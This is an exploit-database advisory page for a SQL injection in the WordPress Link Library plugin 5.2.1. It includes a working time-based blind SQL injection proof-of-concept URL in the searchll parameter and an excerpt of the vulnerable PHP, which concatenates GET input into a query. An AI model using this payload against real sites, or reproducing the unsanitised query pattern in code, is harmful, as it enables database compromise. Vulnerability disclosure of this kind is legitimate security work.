header-logo
Suggest Exploit
vendor:
Link Library plugin
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Link Library plugin
Affected Version From: 5.2.2001
Affected Version To: 5.2.2001
Patch Exists: NO
Related CWE:
CPE: a:wordpress:link_library:5.2.1
Metasploit:
Other Scripts:
Platforms Tested: WordPress
2011

WordPress Link Library plugin <= 5.2.1 SQL Injection Vulnerability

The WordPress Link Library plugin version 5.2.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the underlying database.

Mitigation:

Update to a version higher than 5.2.1. Ensure that magic_quotes are turned on.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Link Library plugin <= 5.2.1 SQL Injection Vulnerability
# Date: 2011-09-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/link-library.zip
# Version: 5.2.1 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/link-library/link-library-ajax.php?searchll=-1')/**/AND/**/1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23

---------------
Vulnerable code
---------------
./link-library-ajax.php:
    echo $my_link_library_plugin->LinkLibrary(...);

./link-library.php:
    class link_library_plugin {
        ...
        function LinkLibrary(...) {
            return $this->PrivateLinkLibrary(...)
        ...
        function PrivateLinkLibrary(...) {
            ...
            if ($_GET['searchll'] != "")
            {
                $searchterms = explode(" ", $_GET['searchll']);

                if ($searchterms)
                {
                    $mode = "search";
                    $termnb = 1;

                    foreach($searchterms as $searchterm)
                    {
                        if ($termnb == 1)
                        {
                            $linkquery .= " AND (link_name like '%" . $searchterm . "%' ";
                            $termnb++;
                        }
            ...
            $linkitems = $wpdb->get_results($linkquery, ARRAY_A);

Navigation

Suggest Exploit

Services By CQR